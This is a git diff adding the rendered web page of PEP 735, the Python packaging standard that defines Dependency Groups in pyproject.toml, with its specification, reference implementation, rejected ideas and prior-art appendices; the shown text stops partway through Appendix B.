+ + + + + \ No newline at end of file diff --git a/pep-0735/index.html b/pep-0735/index.html new file mode 100644 index 00000000000..c8f7e07281d --- /dev/null +++ b/pep-0735/index.html @@ -0,0 +1,1515 @@ + + + + + + + + PEP 735 – Dependency Groups in pyproject.toml | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 735 – Dependency Groups in pyproject.toml

+
+
Author:
+
Stephen Rosen <sirosen0 at gmail.com>
+
Sponsor:
+
Brett Cannon <brett at python.org>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
20-Nov-2023
+
Post-History:
+
14-Nov-2023, 20-Nov-2023
+
Resolution:
+
10-Oct-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP specifies a mechanism for storing package requirements in +pyproject.toml files such that they are not included in any built distribution of +the project.

+

This is suitable for creating named groups of dependencies, similar to +requirements.txt files, which launchers, IDEs, and other tools can find and +identify by name.

+

The feature defined here is referred to as “Dependency Groups”.

+
+
+

Motivation

+

There are two major use cases for which the Python community has no +standardized answer:

+
    +
  • How should development dependencies be defined for packages?
  • +
  • How should dependencies be defined for projects which do not build +distributions (non-package projects)?
  • +
+

In support of these two needs, there are two common solutions which are similar +to this proposal:

+
    +
  • requirements.txt files
  • +
  • package extras
  • +
+

Both requirements.txt files and extras have limitations which this +standard seeks to overcome.

+

Note that the two use cases above describe two different types of projects +which this PEP seeks to support:

+
    +
  • Python packages, such as libraries
  • +
  • non-package projects, such as data science projects
  • +
+

Several motivating use cases are defined in detail in the Use Cases Appendix.

+
+

Limitations of requirements.txt files

+

Many projects may define one or more requirements.txt files, +and may arrange them either at the project root (e.g. requirements.txt and +test-requirements.txt) or else in a directory (e.g. +requirements/base.txt and requirements/test.txt). However, there are +major issues with the use of requirements files in this way:

+
    +
  • There is no standardized naming convention such that tools can discover or +use these files by name.
  • +
  • requirements.txt files are not standardized, but instead provide +options to pip.
  • +
+

As a result, it is difficult to define tool behaviors based on +requirements.txt files. They are not trivial to discover or identify by +name, and their contents may contain a mix of package specifiers and additional +pip options.

+

The lack of a standard for requirements.txt contents also means they are +not portable to any alternative tools which wish to process them other than +pip.

+

Additionally, requirements.txt files require a file per dependency list. +For some use-cases, this makes the marginal cost of dependency groupings high, +relative to their benefit. +A terser declaration is beneficial to projects with a number of small groups of +dependencies.

+

In contrast with this, Dependency Groups are defined at a well known location +in pyproject.toml with fully standardized contents. Not only will they have +immediate utility, but they will also serve as a starting point for future +standards.

+
+
+

Limitations of extras

+

extras are additional package metadata declared in the +[project.optional-dependencies] table. They provide names for lists of +package specifiers which are published as part of a package’s metadata, and +which a user can request under that name, as in pip install 'foo[bar]' to +install foo with the bar extra.

+

Because extras are package metadata, they are not guaranteed to be +statically defined and may require a build system to resolve. +Furthermore, definition of a [project.optional-dependencies] indicates to +many tools that a project is a package, and may drive tool behaviors such as +validation of the [project] table.

+

For projects which are packages, extras are a common solution for defining +development dependencies, but even under these circumstances they have +downsides:

+
    +
  • Because an extra defines optional additional dependencies, it is not +possible to install an extra without installing the current package and +its dependencies.
  • +
  • Because they are user-installable, extras are part of the public interface +for packages. Because extras are published, package developers often are +concerned about ensuring that their development extras are not confused with +user-facing extras.
  • +
+
+
+
+

Rationale

+

This PEP defines the storage of requirements data in lists within a +[dependency-groups] table. +This name was chosen to match the canonical name of the feature +(“Dependency Groups”).

+

This format should be as simple and learnable as possible, having a format +very similar to existing requirements.txt files for many cases. Each list +in [dependency-groups] is defined as a list of package specifiers. For +example:

+
[dependency-groups]
+test = ["pytest>7", "coverage"]
+
+
+

There are a number of use cases for requirements.txt files which require +data which cannot be expressed in PEP 508 dependency specifiers. Such +fields are not valid in Dependency Groups. Including many of the data and +fields which pip supports, such as index servers, hashes, and path +dependencies, requires new standards. This standard leaves room for new +standards and developments, but does not attempt to support all valid +requirements.txt contents.

+

The only exception to this is the -r flag which requirements.txt files +use to include one file in another. Dependency Groups support an “include” +mechanism which is similar in meaning, allowing one dependency group to extend +another.

+

Dependency Groups have two additional features which are similar to +requirements.txt files:

+
    +
  • they are not published as distinct metadata in any built distribution
  • +
  • installation of a dependency group does not imply installation of a package’s +dependencies or the package itself
  • +
+
+

Use Cases

+

The following use cases are considered important targets for this PEP. They are +defined in greater detail in the Use Cases Appendix.

+
    +
  • Web Applications deployed via a non-python-packaging build process
  • +
  • Libraries with unpublished dev dependency groups
  • +
  • Data science projects with groups of dependencies but no core package
  • +
  • Input data to lockfile generation (Dependency Groups should generally not +be used as a location for locked dependency data)
  • +
  • Input data to an environment manager, such as tox, Nox, or Hatch
  • +
  • Configurable IDE discovery of test and linter requirements
  • +
+
+
+

Regarding Poetry and PDM Dependency Groups

+

The existing Poetry and PDM tools already offer a feature which each calls +“Dependency Groups”. However, absent any standard for specifying collections +of dependencies, each tool defines these in a tool-specific way, in the +relevant sections of the [tool] table.

+

(PDM also uses extras for some Dependency Groups, and overlaps the notion +heavily with extras.)

+

This PEP does not support all of the features of Poetry and PDM, which, like +requirements.txt files for pip, support several non-standard extensions +to common dependency specifiers.

+

It should be possible for such tools to use standardized Dependency Groups as +extensions of their own Dependency Group mechanisms. +However, defining a new data format which replaces the existing Poetry and PDM +solutions is a non-goal. Doing so would require standardizing several +additional features, such as path dependencies, which are supported by these +tools.

+
+
+

Dependency Groups are not Hidden Extras

+

Dependency Groups are very similar to extras which go unpublished. +However, there are two major features which distinguish them from extras +further:

+
    +
  • they support non-package projects
  • +
  • installation of a Dependency Group does not imply installation of a package’s +dependencies (or the package itself)
  • +
+
+
+

Future Compatibility & Invalid Data

+

Dependency Groups are intended to be extensible in future PEPs. +However, Dependency Groups should also be usable by multiple tools in a +single Python project. +With multiple tools using the same data, it is possible that one implements +a future PEP which extends Dependency Groups, while another does not.

+

To support users in this case, this PEP defines and recommends validation +behaviors in which tools only examine Dependency Groups which they are using. +This allows multiple tools, using different versions of Dependency Groups data, +to share a single table in pyproject.toml.

+
+
+
+

Specification

+

This PEP defines a new section (table) in pyproject.toml files named +dependency-groups. The dependency-groups table contains an arbitrary +number of user-defined keys, each of which has, as its value, a list of +requirements (defined below). These keys must be +valid non-normalized names, +and must be +normalized +before comparisons.

+

Tools SHOULD prefer to present the original, non-normalized name to users by +default. If duplicate names, after normalization, are encountered, tools SHOULD +emit an error.

+

Requirement lists under dependency-groups may contain strings, tables +(“dicts” in Python), or a mix of strings and tables.

+

Strings in requirement lists must be valid +Dependency Specifiers, +as defined in PEP 508.

+

Tables in requirement lists must be valid Dependency Object Specifiers.

+
+

Dependency Object Specifiers

+

Dependency Object Specifiers are tables which define zero or more dependencies.

+

This PEP standardizes only one type of Dependency Object Specifier, a +“Dependency Group Include”. Other types may be added in future standards.

+
+

Dependency Group Include

+

A Dependency Group Include includes the dependencies of another Dependency +Group in the current Dependency Group.

+

An include is defined as a table with exactly one key, "include-group", +whose value is a string, the name of another Dependency Group.

+

For example, {include-group = "test"} is an include which expands to the +contents of the test Dependency Group.

+

Includes are defined to be exactly equivalent to the contents of the named +Dependency Group, inserted into the current group at the location of the include. +For example, if foo = ["a", "b"] is one group, and +bar = ["c", {include-group = "foo"}, "d"] is another, then bar should +evaluate to ["c", "a", "b", "d"] when Dependency Group Includes are expanded.

+

Dependency Group Includes may specify the same package multiple times. Tools +SHOULD NOT deduplicate or otherwise alter the list contents produced by the +include. For example, given the following table:

+
[dependency-groups]
+group-a = ["foo"]
+group-b = ["foo>1.0"]
+group-c = ["foo<1.0"]
+all = ["foo", {include-group = "group-a"}, {include-group = "group-b"}, {include-group = "group-c"}]
+
+
+

The resolved value of all SHOULD be ["foo", "foo", "foo>1.0", "foo<1.0"]. +Tools should handle such a list exactly as they would handle any other case in +which they are asked to process the same requirement multiple times with +different version constraints.

+

Dependency Group Includes may include lists containing Dependency Group +Includes, in which case those includes should be expanded as well. Dependency +Group Includes MUST NOT include cycles, and tools SHOULD report an error if +they detect a cycle.

+
+
+
+

Example Dependency Groups Table

+

The following is an example of a partial pyproject.toml which uses this to +define four Dependency Groups: test, docs, typing, and +typing-test:

+
[dependency-groups]
+test = ["pytest", "coverage"]
+docs = ["sphinx", "sphinx-rtd-theme"]
+typing = ["mypy", "types-requests"]
+typing-test = [{include-group = "typing"}, {include-group = "test"}, "useful-types"]
+
+
+

Note that none of these Dependency Group declarations implicitly install the +current package, its dependencies, or any optional dependencies. +Use of a Dependency Group like test to test a package requires that the +user’s configuration or toolchain also installs the current package (.). +For example,

+
$TOOL install-dependency-group test
+pip install -e .
+
+
+

could be used (supposing $TOOL is a tool which supports installing +Dependency Groups) to build a testing environment.

+

This also allows for the docs dependency group to be used without +installing the project as a package:

+
$TOOL install-dependency-group docs
+
+
+
+
+

Package Building

+

Build backends MUST NOT include Dependency Group data in built distributions as +package metadata. This means that PKG-INFO in sdists and METADATA in wheels +do not include any referencable fields containing Dependency Groups.

+

It is valid to use Dependency Groups in the evaluation of dynamic metadata, and +pyproject.toml files included in sdists will naturally still contain the +[dependency-groups] table. However, the table contents are not part of a +published package’s interfaces.

+
+
+

Installing Dependency Groups

+

Tools which support Dependency Groups are expected to provide new options and +interfaces to allow users to install from Dependency Groups.

+

No syntax is defined for expressing the Dependency Group of a package, for two +reasons:

+
    +
  • it would not be valid to refer to the Dependency Groups of a third-party +package from PyPI (because the data is defined to be unpublished)
  • +
  • there is not guaranteed to be a current package for Dependency Groups – part +of their purpose is to support non-package projects
  • +
+

For example, a possible pip interface for installing Dependency Groups +would be:

+
pip install --dependency-groups=test,typing
+
+
+

Note that this is only an example. This PEP does not declare any requirements +for how tools support the installation of Dependency Groups.

+
+

Overlapping Install UX with Extras

+

Tools MAY choose to provide the same interfaces for installing Dependency +Groups as they do for installing extras.

+

Note that this specification does not forbid having an extra whose name matches +a Dependency Group.

+

Users are advised to avoid creating Dependency Groups whose names match extras. +Tools MAY treat such matching as an error.

+
+
+
+

Validation and Compatibility

+

Tools supporting Dependency Groups may want to validate data before using it. +However, tools implementing such validation behavior should be careful to allow +for future expansions to this spec, so that they do not unnecessarily emit +errors or warnings in the presence of new syntax.

+

Tools SHOULD error when evaluating or processing unrecognized data in +Dependency Groups.

+

Tools SHOULD NOT eagerly validate the list contents of all Dependency +Groups.

+

This means that in the presence of the following data, most tools will allow +the foo group to be used, and will only error when the bar group is +used:

+
[dependency-groups]
+foo = ["pyparsing"]
+bar = [{set-phasers-to = "stun"}]
+
+
+
+

Linters and Validators may be stricter

+

Eager validation is discouraged for tools which primarily install or resolve +Dependency Groups. +Linters and validation tools may have good cause to ignore this recommendation.

+
+
+
+
+

Reference Implementation

+

The following Reference Implementation prints the contents of a Dependency +Group to stdout, newline delimited. +The output is therefore valid requirements.txt data.

+
import re
+import sys
+import tomllib
+from collections import defaultdict
+
+from packaging.requirements import Requirement
+
+
+def _normalize_name(name: str) -> str:
+    return re.sub(r"[-_.]+", "-", name).lower()
+
+
+def _normalize_group_names(dependency_groups: dict) -> dict:
+    original_names = defaultdict(list)
+    normalized_groups = {}
+
+    for group_name, value in dependency_groups.items():
+        normed_group_name = _normalize_name(group_name)
+        original_names[normed_group_name].append(group_name)
+        normalized_groups[normed_group_name] = value
+
+    errors = []
+    for normed_name, names in original_names.items():
+        if len(names) > 1:
+            errors.append(f"{normed_name} ({', '.join(names)})")
+    if errors:
+        raise ValueError(f"Duplicate dependency group names: {', '.join(errors)}")
+
+    return normalized_groups
+
+
+def _resolve_dependency_group(
+    dependency_groups: dict, group: str, past_groups: tuple[str, ...] = ()
+) -> list[str]:
+    if group in past_groups:
+        raise ValueError(f"Cyclic dependency group include: {group} -> {past_groups}")
+
+    if group not in dependency_groups:
+        raise LookupError(f"Dependency group '{group}' not found")
+
+    raw_group = dependency_groups[group]
+    if not isinstance(raw_group, list):
+        raise ValueError(f"Dependency group '{group}' is not a list")
+
+    realized_group = []
+    for item in raw_group:
+        if isinstance(item, str):
+            # packaging.requirements.Requirement parsing ensures that this is a valid
+            # PEP 508 Dependency Specifier
+            # raises InvalidRequirement on failure
+            Requirement(item)
+            realized_group.append(item)
+        elif isinstance(item, dict):
+            if tuple(item.keys()) != ("include-group",):
+                raise ValueError(f"Invalid dependency group item: {item}")
+
+            include_group = _normalize_name(next(iter(item.values())))
+            realized_group.extend(
+                _resolve_dependency_group(
+                    dependency_groups, include_group, past_groups + (group,)
+                )
+            )
+        else:
+            raise ValueError(f"Invalid dependency group item: {item}")
+
+    return realized_group
+
+
+def resolve(dependency_groups: dict, group: str) -> list[str]:
+    if not isinstance(dependency_groups, dict):
+        raise TypeError("Dependency Groups table is not a dict")
+    if not isinstance(group, str):
+        raise TypeError("Dependency group name is not a str")
+    return _resolve_dependency_group(dependency_groups, group)
+
+
+if __name__ == "__main__":
+    with open("pyproject.toml", "rb") as fp:
+        pyproject = tomllib.load(fp)
+
+    dependency_groups_raw = pyproject["dependency-groups"]
+    dependency_groups = _normalize_group_names(dependency_groups_raw)
+    print("\n".join(resolve(pyproject["dependency-groups"], sys.argv[1])))
+
+
+
+
+

Backwards Compatibility

+

At time of writing, the dependency-groups namespace within a +pyproject.toml file is unused. Since the top-level namespace is +reserved for use only by standards specified at packaging.python.org, +there are no direct backwards compatibility concerns.

+

However, the introduction of the feature has implications for a +number of ecosystem tools, especially those which attempt to support +examination of data in setup.py and requirements.txt.

+
+

Audit and Update Tools

+

A wide range of tools understand Python dependency data as expressed in +requirements.txt files. (e.g., Dependabot, Tidelift, etc)

+

Such tools inspect dependency data and, in some cases, offer tool-assisted or +fully automated updates. +It is our expectation that no such tools would support the new Dependency +Groups at first, and broad ecosystem support could take many months or even some +number of years to arrive.

+

As a result, users of Dependency Groups would experience a degradation in their +workflows and tool support at the time that they start using Dependency Groups. +This is true of any new standard for where and how dependency data are encoded.

+
+
+
+

Security Implications

+

This PEP introduces new syntaxes and data formats for specifying dependency +information in projects. However, it does not introduce newly specified +mechanisms for handling or resolving dependencies.

+

It therefore does not carry security concerns other than those inherent in any +tools which may already be used to install dependencies – i.e. malicious +dependencies may be specified here, just as they may be specified in +requirements.txt files.

+
+
+

How to Teach This

+

This feature should be referred to by its canonical name, “Dependency Groups”.

+

The basic form of usage should be taught as a variant on typical +requirements.txt data. Standard dependency specifiers (PEP 508) can be +added to a named list. Rather than asking pip to install from a +requirements.txt file, either pip or a relevant workflow tool will install +from a named Dependency Group.

+

For new Python users, they may be taught directly to create a section in +pyproject.toml containing their Dependency Groups, similarly to how they +are currently taught to use requirements.txt files. +This also allows new Python users to learn about pyproject.toml files +without needing to learn about package building. +A pyproject.toml file with only [dependency-groups] and no other tables +is valid.

+

For both new and experienced users, the Dependency Group Includes will need to +be explained. For users with experience using requirements.txt, this can be +described as an analogue for -r. For new users, they should be taught that +an include allows one Dependency Group to extend another. Similar configuration +interfaces and the Python list.extend method may be used to explain the +idea by analogy.

+

Python users who have used setup.py packaging may be familiar with common +practices which predate pyproject.toml, in which package metadata is +defined dynamically. Requirements loaded from requirements.txt files and +definitions of static lists prior to setup() invocation readily analogize +with Dependency Groups.

+
+

Interfaces for Use of Dependency Groups

+

This specification provides no universal interface for interacting with +Dependency Groups, other than inclusion in a built package via the project +table. This has implications both for tool authors and for users.

+

Tool authors should determine how or if Dependency Groups are relevant to their +user stories, and build their own interfaces to fit. +For environment managers, resolvers, installers, and related non-build tools, +they will be able to document that they support “PEP 735 Dependency Groups”, +but they will be responsible for documenting their usage modes. +For build backends, supporting Dependency Groups will require support for +inclusion from the project table, but set no other strict requirements.

+

For users, the primary consequence is that they must consult relevant tool +documentation whenever they wish to use Dependency Groups outside of package +builds. +Users should be advised by tools, either through documentation or runtime +warnings or errors, about usages which are disrecommended or not supported. +For example, if a tool wishes to require that all Dependency Groups are +mutually compatible, containing no contradictory package specifiers, it +should document that restriction and advise users on how to appropriately +leverage Dependency Groups for its purposes.

+
+
+
+

Rejected Ideas

+
+

Why not define each Dependency Group as a table?

+

If our goal is to allow for future expansion, then defining each Dependency +Group as a subtable, thus enabling us to attach future keys to each group, +allows for the greatest future flexibility.

+

However, it also makes the structure nested more deeply, and therefore harder +to teach and learn. One of the goals of this PEP is to be an easy replacement +for many requirements.txt use-cases.

+
+
+

Why not define a special string syntax to extend Dependency Specifiers?

+

Earlier drafts of this specification defined syntactic forms for Dependency +Group Includes and Path Dependencies.

+

However, there were three major issues with this approach:

+
    +
  • it complicates the string syntax which must be taught, beyond PEP 508
  • +
  • the resulting strings would always need to be disambiguated from PEP 508 +specifiers, complicating implementations
  • +
+
+
+

Why not allow for more non-PEP 508 dependency specifiers?

+

Several use cases surfaced during discussion which need more expressive +specifiers than are possible with PEP 508.

+

“Path Dependencies”, referring to local paths, and references to +[project.dependencies] were of particular interest.

+

However, there are no existing standards for these features (excepting the +de-facto standard of pip’s implementation details).

+

As a result, attempting to include these features in this PEP results in a +significant growth in scope, to attempt to standardize these various features +and pip behaviors.

+

Special attention was devoted to attempting to standardize the expression of +editable installations, as expressed by pip install -e and PEP 660. +However, although the creation of editable installs is standardized for build +backends, the behavior of editables is not standardized for installers. +Inclusion of editables in this PEP requires that any supporting tool allows for +the installation of editables.

+

Therefore, although Poetry and PDM provide syntaxes for some of these features, +they are considered insufficiently standardized at present for inclusion in +Dependency Groups.

+
+
+

Why is the table not named [run], [project.dependency-groups], …?

+

There are many possible names for this concept. +It will have to live alongside the already existing [project.dependencies] +and [project.optional-dependencies] tables, and possibly a new +[external] dependency table as well (at time of writing, PEP 725, which +defines the [external] table, is in progress).

+

[run] was a leading proposal in earlier discussions, but its proposed usage +centered around a single set of runtime dependencies. This PEP explicitly +outlines multiple groups of dependencies, which makes [run] a less +appropriate fit – this is not just dependency data for a specific runtime +context, but for multiple contexts.

+

[project.dependency-groups] would offer a nice parallel with +[project.dependencies] and [project.optional-dependencies], but has +major downsides for non-package projects. +[project] requires several keys to be defined, such as name and +version. Using this name would either require redefining the [project] +table to allow for these keys to be absent, or else would impose a requirement +on non-package projects to define and use these keys. By extension, it would +effectively require any non-package project allow itself to be treated as a +package.

+
+
+

Why is pip’s planned implementation of --only-deps not sufficient?

+

pip currently has a feature on the roadmap to add an +–only-deps flag. +This flag is intended to allow users to install package dependencies and extras +without installing the current package.

+

It does not address the needs of non-package projects, nor does it allow for +the installation of an extra without the package dependencies.

+
+
+

Why isn’t <environment manager> a solution?

+

Existing environment managers like tox, Nox, and Hatch already have +the ability to list inlined dependencies as part of their configuration data. +This meets many development dependency needs, and clearly associates dependency +groups with relevant tasks which can be run. +These mechanisms are good but they are not sufficient.

+

First, they do not address the needs of non-package projects.

+

Second, there is no standard for other tools to use to access these data. This +has impacts on high-level tools like IDEs and Dependabot, which cannot support +deep integration with these Dependency Groups. (For example, at time of writing +Dependabot will not flag dependencies which are pinned in tox.ini files.)

+
+
+
+

Deferred Ideas

+
+

Why not support Dependency Group Includes in [project.dependencies] or [project.optional-dependencies]?

+

Earlier drafts of this specification allowed Dependency Group Includes to be +used in the [project] table. +However, there were several issues raised during community feedback which led +to its removal.

+

Only a small number of additional use cases would be addressed by the inclusion +of Dependency Groups, and it increased the scope of the specification +significantly. In particular, this inclusion would increase the number of parties +impacted by the addition. Many readers of the [project] table, including build +backends, SBOM generators, and dependency analyzers are implicated by a change to +[project] but may continue to operate as-is in the presence of a new (but +unconnected) [dependency-groups] table.

+

Separately from the above concern, allowing inclusion of dependency groups from the +[project] table encourages package maintainers to move dependency metadata out +of the current standard location. +This complicates static pyproject.toml metadata and conflicts with the goal of +PEP 621 to store dependency metadata in a single location.

+

Finally, exclusion of [project] support from this PEP is not final. The +use of includes from that table, or an inclusion syntax from +[dependency-groups] into [project], could be introduced by a future +PEP and considered on its own merits.

+
+

Use Cases for Dependency Group Includes From [project]

+

Although deferred in this PEP, allowing includes from the [project] +table would address several use cases.

+

In particular, there are cases in which package developers would like to +install only the dependencies of a package, without the package itself.

+

For example:

+
    +
  • Specify different environment variables or options when building dependencies +vs when building the package itself
  • +
  • Creating layered container images in which the dependencies are isolated from +the package being installed
  • +
  • Providing the dependencies to analysis environments (e.g., type checking) +without having to build and install the package itself
  • +
+

For an example of the last case, consider the following sample +pyproject.toml:

+
[project]
+dependencies = [{include = "runtime"}]
+[optional-dependencies]
+foo = [{include = "foo"}]
+[dependency-groups]
+runtime = ["a", "b"]
+foo = ["c", "d"]
+typing = ["mypy", {include = "runtime"}, {include = "foo"}]
+
+
+

In this case, a typing group can be defined, with all of the package’s +runtime dependencies, but without the package itself. This allows uses of the +typing Dependency Group to skip installation of the package – not only is +this more efficient, but it may reduce the requirements for testing systems.

+
+
+
+

Why not support Dependency Group Includes in [build-system.requires]?

+

Given that we will not allow for [project] usage of Dependency Groups, +[build-system.requires] can be considered in comparison with +[project.dependencies].

+

There are fewer theoretical usages for build requirements specified in a group +than package requirements. Additionally, the impact of such a change implicates +PEP 517 frontend, which would need to support Dependency Groups in order to +prepare a build environment.

+

Compared with changes to [project.dependencies] and +[project.optional-dependencies], changing the behaviors of +[build-system.requires] is higher impact and has fewer potential uses. +Therefore, given that this PEP declines to make changes to the [project] +table, changing [build-system] is also deferred.

+
+
+

Why not support a Dependency Group which includes the current project?

+

Several usage scenarios for dependency groups revolve around installing a +dependency group alongside a package defined in the [project] table. +For example, testing a package involves installing testing dependencies and the +package itself. Additionally, the compatibility of a dependency group with the +main package is a valuable input to lockfile generators.

+

In such cases, it is desirable for a Dependency Group to declare that it +depends upon the project itself. Example syntaxes from discussions included +{include-project = true} and {include-group = ":project:"}.

+

However, if a specification is established to extend PEP 508 with Path +Dependencies, this would result in Dependency Groups having two ways of +specifying the main package. For example, if . becomes formally supported, +and {include-project = true} is included in this PEP, then dependency +groups may specify any of the following groups

+
[dependency-groups]
+case1 = [{include-project = true}]
+case2 = ["."]
+case3 = [{include-project = true}, "."]
+case4 = [{include-project = false}, "."]
+
+
+

In order to avoid a confusing future in which multiple different options +specify the package defined in pyproject.toml, any syntax for declaring +this relationship is omitted from this PEP.

+
+
+
+

Appendix A: Prior Art in Non-Python Languages

+

This section is primarily informational and serves to document how other +language ecosystems solve similar problems.

+
+

JavaScript and package.json

+

In the JavaScript community, packages contain a canonical configuration and +data file, similar in scope to pyproject.toml, at package.json.

+

Two keys in package.json control dependency data: "dependencies" and +"devDependencies". The role of "dependencies" is effectively the same +as that of [project.dependencies] in pyproject.toml, declaring the +direct dependencies of a package.

+
+

"dependencies" data

+

Dependency data is declared in package.json as a mapping from package names +to version specifiers.

+

Version specifiers support a small grammar of possible versions, ranges, and +other values, similar to Python’s PEP 440 version specifiers.

+

For example, here is a partial package.json file declaring a few +dependencies:

+
{
+    "dependencies": {
+        "@angular/compiler": "^17.0.2",
+        "camelcase": "8.0.0",
+        "diff": ">=5.1.0 <6.0.0"
+    }
+}
+
+
+

The use of the @ symbol is a scope which declares the package +owner, for organizationally owned packages. +"@angular/compiler" therefore declares a package named compiler grouped +under angular ownership.

+
+
+

Dependencies Referencing URLs and Local Paths

+

Dependency specifiers support a syntax for URLs and Git repositories, similar +to the provisions in Python packaging.

+

URLs may be used in lieu of version numbers. +When used, they implicitly refer to tarballs of package source code.

+

Git repositories may be similarly used, including support for committish +specifiers.

+

Unlike PEP 440, NPM allows for the use of local paths to package source code +directories for dependencies. When these data are added to package.json via +the standard npm install --save command, the path is normalized to a +relative path, from the directory containing package.json, and prefixed +with file:. For example, the following partial package.json contains a +reference to a sibling of the current directory:

+
{
+    "dependencies": {
+        "my-package": "file:../foo"
+    }
+}
+
+
+

The official NPM documentation +states that local path dependencies “should not” be published to public package +repositories, but makes no statement about the inherent validity or invalidity +of such dependency data in published packages.

+
+
+

"devDependencies" data

+

package.json is permitted to contain a second section named +"devDependencies", in the same format as "dependencies". +The dependencies declared in "devDependencies" are not installed by default +when a package is installed from the package repository (e.g. as part of a +dependency being resolved) but are installed when npm install is run in the +source tree containing package.json.

+

Just as "dependencies" supports URLs and local paths, so does +"devDependencies".

+
+
+

"peerDependencies" and "optionalDependencies"

+

There are two additional, related sections in package.json which have +relevance.

+

"peerDependencies" declares a list of dependencies in the same format as +"dependencies", but with the meaning that these are a compatibility +declaration. +For example, the following data declares compatibility with package foo +version 2:

+
{
+    "peerDependencies": {
+        "foo": "2.x"
+    }
+}
+
+
+

"optionalDependencies" declares a list of dependencies which should be +installed if possible, but which should not be treated as failures if they are +unavailable. It also uses the same mapping format as "dependencies".

+
+
"peerDependenciesMeta"
+

"peerDependenciesMeta" is a section which allows for additional control +over how "peerDependencies" are treated.

+

Warnings about missing dependencies can be disabled by setting packages to +optional in this section, as in the following sample:

+
{
+    "peerDependencies": {
+        "foo": "2.x"
+    },
+    "peerDependenciesMeta": {
+        "foo": {
+            "optional": true
+        }
+    }
+}
+
+
+
+
+
+

--omit and --include

+

The npm install command supports two options, --omit and --include, +which can control whether “prod”, “dev”, “optional”, or “peer” dependencies are installed.

+

The “prod” name refers to dependencies listed under "dependencies".

+

By default, all four groups are installed when npm install is executed +against a source tree, but these options can be used to control installation +behavior more precisely. +Furthermore, these values can be declared in .npmrc files, allowing +per-user and per-project configurations to control installation behaviors.

+
+
+
+

Ruby & Ruby Gems

+

Ruby projects may or may not be intended to produce packages (“gems”) in the +Ruby ecosystem. In fact, the expectation is that most users of the language do +not want to produce gems and have no interest in producing their own packages. +Many tutorials do not touch on how to produce packages, and the toolchain never +requires user code to be packaged for supported use-cases.

+

Ruby splits requirement specification into two separate files.

+
    +
  • Gemfile: a dedicated file which only supports requirement data in the form +of dependency groups
  • +
  • <package>.gemspec: a dedicated file for declaring package (gem) metadata
  • +
+

The bundler tool, providing the bundle command, is the primary interface +for using Gemfile data.

+

The gem tool is responsible for building gems from .gemspec data, via the +gem build command.

+
+

Gemfiles & bundle

+

A Gemfile is a Ruby file +containing gem directives enclosed in any number of group declarations. +gem directives may also be used outside of the group declaration, in which +case they form an implicitly unnamed group of dependencies.

+

For example, the following Gemfile lists rails as a project dependency. +All other dependencies are listed under groups:

+
source 'https://rubygems.org'
+
+gem 'rails'
+
+group :test do
+  gem 'rspec'
+end
+
+group :lint do
+  gem 'rubocop'
+end
+
+group :docs do
+  gem 'kramdown'
+  gem 'nokogiri'
+end
+
+
+

If a user executes bundle install with these data, all groups are +installed. Users can deselect groups by creating or modifying a bundler config +in .bundle/config, either manually or via the CLI. For example, bundle +config set --local without 'lint:docs'.

+

It is not possible, with the above data, to exclude the top-level use of the +'rails' gem or to refer to that implicit grouping by name.

+
+
+

gemspec and packaged dependency data

+

A gemspec file is a +ruby file containing a Gem::Specification +instance declaration.

+

Only two fields in a Gem::Specification pertain to package dependency data. +These are add_development_dependency and add_runtime_dependency. +A Gem::Specification object also provides methods for adding dependencies +dynamically, including add_dependency (which adds a runtime dependency).

+

Here is a variant of the rails.gemspec file, with many fields removed or +shortened to simplify:

+
version = '7.1.2'
+
+Gem::Specification.new do |s|
+  s.platform    = Gem::Platform::RUBY
+  s.name        = "rails"
+  s.version     = version
+  s.summary     = "Full-stack web application framework."
+
+  s.license = "MIT"
+  s.author   = "David Heinemeier Hansson"
+
+  s.files = ["README.md", "MIT-LICENSE"]
+
+  # shortened from the real 'rails' project
+  s.add_dependency "activesupport", version
+  s.add_dependency "activerecord",  version
+  s.add_dependency "actionmailer",  version
+  s.add_dependency "activestorage", version
+  s.add_dependency "railties",      version
+end
+
+
+

Note that there is no use of add_development_dependency. +Some other mainstream, major packages (e.g. rubocop) do not use development +dependencies in their gems.

+

Other projects do use this feature. For example, kramdown makes use of +development dependencies, containing the following specification in its +Rakefile:

+
s.add_dependency "rexml"
+s.add_development_dependency 'minitest', '~> 5.0'
+s.add_development_dependency 'rouge', '~> 3.0', '>= 3.26.0'
+s.add_development_dependency 'stringex', '~> 1.5.1'
+
+
+

The purpose of development dependencies is only to declare an implicit group, +as part of the .gemspec, which can then be used by bundler.

+

For full details, see the gemspec directive in bundler's +documentation on Gemfiles. +However, the integration between .gemspec development dependencies and +Gemfile/bundle usage is best understood via an example.

+
+
gemspec development dependency example
+

Consider the following simple project in the form of a Gemfile and .gemspec. +The cool-gem.gemspec file:

+
Gem::Specification.new do |s|
+  s.author = 'Stephen Rosen'
+  s.name = 'cool-gem'
+  s.version = '0.0.1'
+  s.summary = 'A very cool gem that does cool stuff'
+  s.license = 'MIT'
+
+  s.files = []
+
+  s.add_dependency 'rails'
+  s.add_development_dependency 'kramdown'
+end
+
+
+

and the Gemfile:

+
source 'https://rubygems.org'
+
+gemspec
+
+
+

The gemspec directive in Gemfile declares a dependency on the local +package, cool-gem, defined in the locally available cool-gem.gemspec +file. It also implicitly adds all development dependencies to a dependency +group named development.

+

Therefore, in this case, the gemspec directive is equivalent to the +following Gemfile content:

+
gem 'cool-gem', :path => '.'
+
+group :development do
+  gem 'kramdown'
+end
+
+
+
+
+
+
+
+

Appendix B: Prior Art in Python

+

In the absence of any prior standard for Dependency Groups, two known workflow +tools, PDM and Poetry, have defined their own solutions.

+

This section will primarily focus on these two tools as cases of prior art +regarding the definition and use of Dependency Groups in Python.

+
+

Projects are Packages

+

Both PDM and Poetry treat the projects they support as packages. +This allows them to use and interact with standard pyproject.toml metadata +for some of their needs, and allows them to support installation of the +“current project” by doing a build and install using their build backends.

+

Effectively, this means that neither Poetry nor PDM supports non-package projects.

+
+
+

Non-Standard Dependency Specifiers

+

PDM and Poetry extend PEP 508 dependency specifiers with additional features +which are not part of any shared standard. +The two tools use slightly different approaches to these problems, however.

+

